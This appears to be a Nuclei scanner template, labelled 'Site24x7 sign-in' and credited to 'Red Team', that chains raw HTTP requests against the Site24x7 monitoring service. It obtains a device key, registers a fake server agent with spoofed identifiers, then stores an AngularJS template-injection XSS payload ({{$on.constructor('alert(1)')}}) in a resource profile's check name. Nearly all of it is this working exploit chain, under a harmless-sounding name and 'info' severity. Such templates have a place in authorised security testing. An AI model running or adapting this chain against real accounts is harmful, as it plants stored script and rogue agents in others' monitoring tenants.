id: add_server_agent

info:
  name: Site24x7 sign-in
  author: Red Team
  severity: info
  tags: admin

requests:
   - raw:
      - |
        GET /api/device_key HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json; version=2.0
        Authorization: Zoho-oauthtoken {{access_token}}

      - |
        @Host: https://{{plus_host}}
        POST /plus/RegisterAgent?monagentDNS=UBSKNGMEDWEB07&monagentID=UBSKNGMEDWEB07&bno=1820&agentUniqueID=12344&isMasterAgent=NO&osName=Linux&uuid=420DCDF2-9A34-7FA8-6C9E-221BCA40E8EC&timeStamp=1628759680777&upTime=31551180&MACAddress=12:03:00:01:4b:be&subtype=Linux&updateStatus=no&monagentKey=SITE24X7&freeServiceFormat=json&OsArch=64bit&custID={{device_key}}&agentVersion=18.2.0&IpAddress=192.168.120.52&category=Workstation HTTP/1.1
        Host: {{plus_host}}

      - |
        POST /api/server_config_overview HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json; version=2.0
        Authorization: Zoho-oauthtoken {{access_token}}

        {"dontShowOverview":true}

      - |
        POST /api/resource_profile HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json; version=2.0
        Authorization: Zoho-oauthtoken {{access_token}}

        {"checks":[{"parentdir":"\\","file":"test","checkname":"{{$on.constructor('alert(1)')}}","resource":"test","checktype":2001}],"profile_name":"test","monitor_list":["27408000000010027"]}

     extractors:
         - type: json
           part: body
           name: device_key
           json:
             - '.data.device_key'
           internal: true

     matchers:
       - type: status
         status:
             - 201


